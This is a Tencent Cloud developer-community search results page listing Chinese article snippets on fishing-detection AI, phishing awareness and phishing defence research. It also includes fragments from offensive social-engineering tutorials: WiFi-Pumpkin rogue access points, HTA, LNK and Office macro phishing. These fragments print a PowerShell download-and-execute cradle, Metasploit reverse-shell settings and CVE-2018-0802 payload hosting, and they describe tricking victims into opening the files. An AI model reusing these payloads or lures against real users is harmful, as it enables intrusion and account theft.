- 综合排序
- 最热优先
- 最新优先
- 来自专栏燧机科技-视频AI智能分析
河边钓鱼识别检测系统 守护水库安全
一、明确可识别的视觉行为特征需强调:AI无法判断“是否违法”,但可识别符合禁渔政策明确定义的可视行为,例如:持竿静止:人员在水边保持站立/坐姿 >3分钟,且手持细长杆状物体指向水面;岸边聚集:多人在禁渔区岸边长时间停留 行为判别层构建空间规则:若“人”与“钓竿”距离<1米,且“人”位于水体边缘缓冲区内,持续>180秒,则标记为“疑似钓鱼”;排除干扰:行人路过(移动速度>0.5m/s)、摄影(三脚架+相机)等。 告警与通信层通过4G/5G将告警截图+30秒视频片段上传至渔政管理平台;原始视频在边缘设备完成分析后立即丢弃,不存储、不上传;符合《个人信息保护法》关于公共场所图像处理的规定。 注:在实验室模拟河岸场景(晴天、无遮挡、距离<30米)下,系统对持竿钓鱼行为的识别召回率达90.3%,误报率约5%(样本量:600段视频)。 河边钓鱼识别系统作为“数字护渔员”,虽不能杜绝违法行为,但可显著提升巡查效率。而这一切的前提,是清醒认知技术的边界——AI是眼睛的延伸,不是法律的执行者。
18910编辑于 2026-01-21 - 来自专栏全栈程序员必看
钓鱼诈骗网站哪里举报_如何识别诈骗
其实这种的一看就是钓鱼或者诈骗网站,不过出于好奇,我还是想把它下下来看一下。 由此,我们可以总结出一种辨别钓鱼网站的方法: 二、识别方法——看域名 域名,也就是俗称的网址、地址。通常当我们打开一个网站的时候,域名会在浏览器标题栏下方,页面内容的上方显示。 但是,即使是知道了这点,还是不足以抵御所有钓鱼网站的欺骗,请看下面这个例子,这是我昨天收到的一封群邮件指向的钓鱼网站(天知道我为什么连着两个天收到这种东西): 该网站的地址为https://mail.qq.com 62eeb0df76fca46f2e6f8fc63beb4ada 我们上面所提到的域名指的是从https://到下一个/中间的那一部分,即mail.qq.com,这一段是域名,而不包括后面的部分,至于再往后面是什么,我们暂时不用管,只要按照上面的方法识别域名 ,就足够辨认出钓鱼网站。
2.3K10编辑于 2022-09-22 - 来自专栏公共互联网反网络钓鱼(APCN)
带你识别和防范钓鱼软件与网站
三、钓鱼网站主要特点与识别方法通过综合分析钓鱼网站域名、网页内容特点,可以更准确地识别钓鱼网站,并采取相应防范措施保护个人信息和财产安全。 (一)钓鱼网站域名的常见特征1.替换字符:钓鱼网站常使用与正规网站相似的域名,如仿冒DeepSeek的钓鱼网站使用“deeepseek”“deepsek”等类似域名。 4.定期关注最新钓鱼手法:网络钓鱼技术不断演变,攻击者会利用最新的热点事件和技术进行诈骗。关注网络安全新闻,了解当前流行的钓鱼技术,以快速识别潜在威胁。 (二)学习实用的钓鱼识别技巧1.不要随意点击来自陌生人邮件、社交媒体或者短信中的链接或附件。在访问网站前,仔细检查域名拼写,注意是否有额外的字母、数字或特殊符号。 随着技术的发展,钓鱼攻击的手段也在不断演变,但只要我们有足够的防范意识和正确的防范方法,就能大大降低成为钓鱼攻击受害者的风险,免受钓鱼攻击侵害。
1.3K10编辑于 2025-10-10 - 来自专栏燧机科技-视频AI智能分析
离岗识别 yolov5
离岗识别算法模型通过yolov5网络模型技术,离岗识别可以自动识别现场画面中人员离岗等行为,发现违规行为立即抓拍告警。 YOLOv5是一种单阶段目标检测算法,该算法在YOLOv4的基础上添加了一些新的改进思路,使其速度与精度都得到了极大的性能提升。 而YOLOv5的Neck网络中,采用借鉴CSPnet设计的CSP2结构,从而加强网络特征融合能力。 下图展示了YOLOv4与YOLOv5的Neck网络的具体细节,通过比较我们可以发现:(1)灰色区域表示第1个不同点,YOLOv5不仅利用CSP2_\1结构代替部分CBL模块,而且去掉了下方的CBL模块; (2)绿色区域表示第2个不同点,YOLOv5不仅将Concat操作之后的CBL模块更换为CSP2_1模块,而且更换了另外一个CBL模块的位置;(3)蓝色区域表示第3个不同点,YOLOv5中将原始的CBL
55000编辑于 2023-05-20 - 来自专栏安恒信息
邮箱安全第10期 | DMARC-识别并拦截钓鱼邮件
减少成功的网络钓鱼交付。 在互联网规模工作。 最小化复杂性。
2.7K71发布于 2018-04-10 - 来自专栏黑客技术家园
如何利用kali制作一个“钓鱼”网站,以及如何识别
尽管当今互联网的安全措施已经很完善,但是还是会出现“被盗号”的情况,很多情况下是“有心人”的钓鱼网站导致的,今天的文章主要讲一下kali下使用setoolkit来制作钓鱼网站。 Java applet攻击 Metasploit浏览器攻击 钓鱼网站攻击 标签钓鱼攻击 网站jacking攻击 多种网站攻击 全屏幕攻击1234567 这里选择3,钓鱼网站攻击 ? 如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。这里我详细讲一下站点克隆的方法。 总结 大家也可以看到,钓鱼网站的制作其实并不难,所以我们平常在访问一些常用的有账号登陆的地方一定要看清楚url,防止被钓鱼。
8.2K30发布于 2021-04-02 - 来自专栏White feathe 的博客
H5 图像识别
识别对比 ---- 1、百度识别 发现百度的图片搜索识别率不是特别,下面为测试图片跟测试后的结果: 测试图片: 下面为测试后的结果: 2、采用 tesseract.js 后结果 H5 图像识别 (采用Tesseract.js 进行识别) ---- 简单的文案之类的,识别的还算可以,但是稍微复杂点的,准确率就不是那么好了,在学习中。。。 font-family:"arial, helvetica, sans-serif"}fieldset{margin-bottom:10%;border:1px solid #ddd;border-radius:5px ratio for chucking outlines edges_debug 0 turn on debugging for this module edges_max_children_layers 5 classes matcher_rating_margin 0.1 New template margin (0-1) matcher_sufficient_examples_for_prototyping 5
4.3K30编辑于 2021-12-08 - 来自专栏四楼没电梯
java验证码识别--5
java验证码识别--1 http://blog.csdn.net/problc/article/details/5794460 java验证码识别--2 http://blog.csdn.net/problc /article/details/5797507 java验证码识别--3 http://blog.csdn.net/problc/article/details/5800093 java验证码识别-- 4 http://blog.csdn.net/problc/article/details/5846614 java验证码识别--5 http://blog.csdn.net/problc/article 得到model之后,把要识别的图片同样弄成libsvm的格式,存成predict.txt label indexi:valuei 0 1:0 2:0 3:0 4:0 5:0 6:0 7:0 8:0 9: 因为要识别的图片还不知道是哪个数字,所以其中label可以填成任何数 然后用svmpredict predict.txt data.txt.model output.txt 这样识别结果就在output.txt
39410编辑于 2024-10-12 - 来自专栏公共互联网反网络钓鱼(APCN)
网络钓鱼攻击特征识别与多维度防御技术研究
本文基于钓鱼攻击实战特征,围绕识别逻辑、检测模型、代码实现、处置流程与防御体系展开研究,严格遵循技术准确、逻辑严谨、论据闭环原则,聚焦可落地、可验证、可扩展的防御方案,为不同场景用户提供标准化参考。 UTHSC 安全提示明确指出,钓鱼信息通过情绪诱导促使用户未经思考执行操作,这一特征贯穿所有钓鱼场景,是识别攻击的关键依据。 3.2 文本语义与情感检测技术钓鱼文本具有强意图导向,语义与情感特征稳定,可通过 NLP 实现精准识别。 3.3 页面结构与 DOM 检测技术钓鱼页面为实现窃取目标,DOM 结构存在固定特征,可通过代码解析识别。 5 钓鱼攻击全流程处置机制5.1 事前预防机制域名白名单管理:建立机构、合作伙伴可信域名库,优先放行白名单请求;内容模板规范:统一内部通知格式、标题规范、发送渠道,减少伪造空间;人员意识培训:聚焦情绪诱导
30810编辑于 2026-04-03 - 来自专栏公共互联网反网络钓鱼(APCN)
多任务处理对员工钓鱼邮件识别能力的影响研究
摘要本文基于KnowBe4平台近期发布的实证研究数据,结合认知负荷理论与人因安全模型,系统分析多任务工作状态对员工识别钓鱼邮件能力的负面影响。 本文旨在系统探讨多任务状态如何削弱员工对钓鱼邮件的识别能力,分析其背后的心理机制与组织诱因,并基于实证数据提出可操作的缓解措施。 KnowBe4(2025)的研究首次将该理论应用于钓鱼识别场景。 、参与5分钟语音会议摘要记录,并在30分钟内完成一份简报草稿。 主要观测指标包括:钓鱼邮件打开率;恶意链接点击率;在仿冒页面输入凭证的比例;对异常信号的自评识别程度(事后问卷)。所有操作均在受控虚拟桌面环境中进行,确保无真实风险。
21210编辑于 2025-11-06 - 来自专栏网络安全攻防
社工钓鱼之WIFI钓鱼
文章前言 本篇文章我们主要介绍常见的几种WIFI钓鱼方法与具体的实现 钓鱼实践 WiFi-Pumpkin 框架介绍 WiFi-Pumpkin是一款专用于无线环境渗透测试的框架,该工具可以伪造AP以完成中间人攻击 Step 5:点击activity-mouitor选项卡即可看到对方访问网站的密码 WIFI-Pumpkin3 框架介绍 WiFi-Pumpkin3是一款专用于无线环境渗透测试的框架,该工具可以伪造 git clone https://github.com/P0cL4bs/wifipumpkin3.git cd wifipumpkin3 sudo apt install python3-pyqt5 检查pyQt5是否已经完成安装: python3 -c "from PyQt5.QtCore import QSettings; print('done')" 安装依赖项: 安装WP3: sudo WiFi Step 4:之后选择攻击模式,第一个为固件升级,第二个为浏览器插件更新,第三个为登录认证页面 之后会出现两个AP: Step 4:用户链接AP 原来的AP无法正常链接: Step 5:
2.9K10编辑于 2023-08-10 - 来自专栏公共互联网反网络钓鱼(APCN)
“识别、拦截双攻略”AI时代的钓鱼网站陷阱案例
当前网络钓鱼呈现AI化趋势,不法分子一方面能够高度仿冒银行、电商、机构等官方客服人员音色和语调,通过电话或语音消息诱导用户放松警惕,进而促使其访问精心伪装的钓鱼网站或泄露敏感信息;另一方面利用AI快速 、批量生成与真实界面高度相似的网站或APP交互页面,诱导用户点击页面,窃取用户重要数据(如社交动态、消费习惯、人际关系、账户信息等),网络钓鱼攻击的成功率和危害性大大增加。 此案暴露了关键防护难点,传统安全软件难以识别AI生成的动态二维码,该事件最终推动防护策略升级。 AI技术驱动的网络钓鱼已演变为全球性重大问题,近年来的典型案例揭示了其核心风险,攻击者通过深度伪造、实时交互及多模态合成技术持续突破传统防御边界。 作者:郭军 中国互联网络信息中心创新业务所编辑:芦笛(公共互联网反网络钓鱼工作组)
79010编辑于 2025-10-09 - 来自专栏燧机科技-视频AI智能分析
河湖禁钓区钓鱼识别监测系统 守护河湖生态
为提升监管效率,部分水利或城管部门试点部署了“河湖禁钓区钓鱼识别监测系统”。 需强调:AI无法判断“是否属于禁钓区”或“是否使用非法工具”,仅能对岸边可见的疑似钓鱼姿态与动作进行初判,包括:持杆静止:人员手持细长杆状物体,长时间面向水面;抛竿/收线动作:手臂有明显挥动或拉拽轨迹; 系统无法实现:区分“钓鱼”与“拍照自拍杆”“撑伞”“测量仪器”;识别水下网具、电鱼设备等非法捕捞工具;判定该区域是否属于法定禁钓区(需GIS地理围栏联动);二、系统架构:目标检测 + 动作建模 + 边缘推理系统采用三层边缘设计 行为判别层结合OpenPose提取手臂关键点,计算运动矢量;设定规则:若连续满足“手持细长物体 + 面向水面 + 静止 >2分钟”或“有抛竿动作”,则标记为“疑似钓鱼”;引入时间缓冲:避免将短暂驻足游客误判为违规 三、部署优势与现实约束黑光+变焦摄像机可覆盖50~150米岸线,提升单点效率;支持太阳能+4G,适用于无市电的偏远河段;局限性:夜间或雨雾天气下识别率大幅下降;无法识别水中作业或隐蔽捕捞行为;对“一人多竿
16310编辑于 2026-02-03 - 来自专栏公共互联网反网络钓鱼(APCN)
仿冒政府网站钓鱼攻击的识别机制与防御策略研究
尽管官方IC3平台(www.ic3.gov)明确声明不收取费用、不索取银行信息,且仅使用.gov顶级域,但普通用户仍难以在搜索结果中准确识别真伪。 三、现有防御机制的局限性分析(一)浏览器安全提示不足现代浏览器虽能识别HTTPS与证书有效性,但无法判断网站内容是否合法。 四、多层次防御框架设计针对上述问题,本文提出“识别—验证—干预”三位一体防御框架。 二)浏览器扩展:页面哈希比对可开发轻量级Chrome扩展,在访问含“ic3”关键词的页面时自动比对DOM结构:// content.jsconst OFFICIAL_HASH = "a1b2c3d4e5 编辑:芦笛(公共互联网反网络钓鱼工作组)
31110编辑于 2025-12-21 - 来自专栏网络安全攻防
社工钓鱼之HTA钓鱼
钓鱼实践 Step 1:新增listener Step 2:选择"Attacks—>packages—>HTML application" Step 2:选择Powershell,之后点击"Generate 3:保存载荷 Step 4:之后以邮件或者社交软件(例如:QQ、微信)的方式发送给第三方用户,并诱导其进行点击操作 PS:本来想使用ChatGPT来生成一段关于诱导用户点开evil.hta文件的钓鱼话术 Step 5:成功返回会话 文末小结 本篇文章我们介绍了HTA钓鱼的基本流程,在实战中可以通过社交软件或者邮件的方式发送给受害者用户进行执行并获取权限
1.1K30编辑于 2023-05-12 - 来自专栏网络安全攻防
社工钓鱼之LNK钓鱼
文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell 命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch '+ $file $Shortcut.Save() Step 4:运行Al1ex.ps1,之后生成LNK文件 Step 5: 后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6:之后成功获得Shell 文末小结 基于LNK文件的钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加
2.4K20编辑于 2023-05-12 - 来自专栏网络安全攻防
社工钓鱼之Office钓鱼(上)
http://192.168.174.131/shell.exe -l/root/shell.exe Step 4:开启metasploit的监听模块进行监听,设置响应载荷以及监听IP Step 5: 20Office/CVE-2018-0802 Step 2:打开MSF设置攻击IP,准备接受反弹shell Step 3:执行exploit进行监听 Step 4:制作payload文档 Step 5: > Step 2:启动服务托管载荷 python3 exploit.py host 80 Step 4:将out文件夹下的word发送给受害者用户点击,之后成功弹出计算器 请求记录如下: 社工钓鱼 执行以下命令生成恶意载荷并更新用于托管载荷的地址信息 python3 exploit.py generate test/shell.dll http://192.168.174.128 Step 4:使用MSF监听载荷 Step 5: 钓鱼中大部分情况都需要用户进行交互,例如:点击启用宏或者更新数据文档,这无疑会增加用户的怀疑,在社工钓鱼中药特别注意
92330编辑于 2023-05-26 - 来自专栏网络安全攻防
社工钓鱼之Office钓鱼(下)
A0 之后模拟用户打开Excel文件: 发现载荷成功执行: 钓鱼实践 这里使用MSF框架来实施攻击: use exploit/windows/misc/hta_server msf exploit msf > set LPORT 6666 msf > set set PAYLOAD windows/x64/meterpreter/reverse_tcp msf > exploit Step 5:
78720编辑于 2023-05-26 - 来自专栏网络安全攻防
社工钓鱼之Office钓鱼(中)
文章前言 本篇文章我们主要介绍Office在钓鱼中常见的应用与技巧 钓鱼实践 Office Macro 实验说明 Office宏,译自英文单词Macro,宏是微软公司为其OFFICE软件包设计的一个特殊功能 在本小节中,我们的目的是构造一个存在恶意宏代码的简历文件并将其投放给HR,通过钓鱼控制目标主机 实验步骤 Step 1:首先准备一份简历 Step 2:使用CS生成恶意宏代码 Step 3:弹出界面选择 Listener Step 4:之后生成恶意宏代码 Step 5:之后在word简历中插入恶意宏代码,首先转到"视图->宏->查看宏' 之后新建宏名——shell 清空所有代码,然后将复制的代码粘贴到编辑器中 raw=true Step 4:接下来将刚才解压生成的文件压缩回去: Step 5:将生成的压缩文件改名为后缀名为docx的文件 Step 5:将生成的恶意文件用邮箱钓鱼、qq或微信文件发送给受害者 powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.174.129:1234/shell.ps2') " Step 5:
1K30编辑于 2023-05-26 - 来自专栏公共互联网反网络钓鱼(APCN)
“识别、拦截双攻略”教你如何破局AI钓鱼网站陷阱!
面对这一严峻挑战,传统的“肉眼识别”已力不从心。正如DeepSeek诞生以来迅速走红,但名声大噪的同时,一大批仿冒网站也迅速涌现且数量仍在持续激增。 接下来,我们将深入剖析AI钓鱼网站的核心特征,并为你提供一套专业、可落地的识别与拦截双攻略,助你筑牢数字防线。 一、钓鱼攻击的“智能化”蜕变内容生成以假乱真: AI大模型(如DeepSeek)能轻松生成语法完美、逻辑顺畅、风格高度匹配目标品牌的邮件、网站文案、客服对话脚本等,甚至能够模仿特定联系人语气,让人难以识别 二、练就“火眼金睛”,快速识别钓鱼陷阱(一)URL深度解构同形文字攻击: 重点检查域名中是否混用视觉相似的字符。 它们利用AI/ML分析文件、进程、网络行为,能更有效识别和阻断新型钓鱼攻击。强制HTTPS: 浏览器插件强制使用加密链接,减少在明文HTTP下被劫持或访问到钓鱼镜像的风险。
57610编辑于 2025-10-09
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号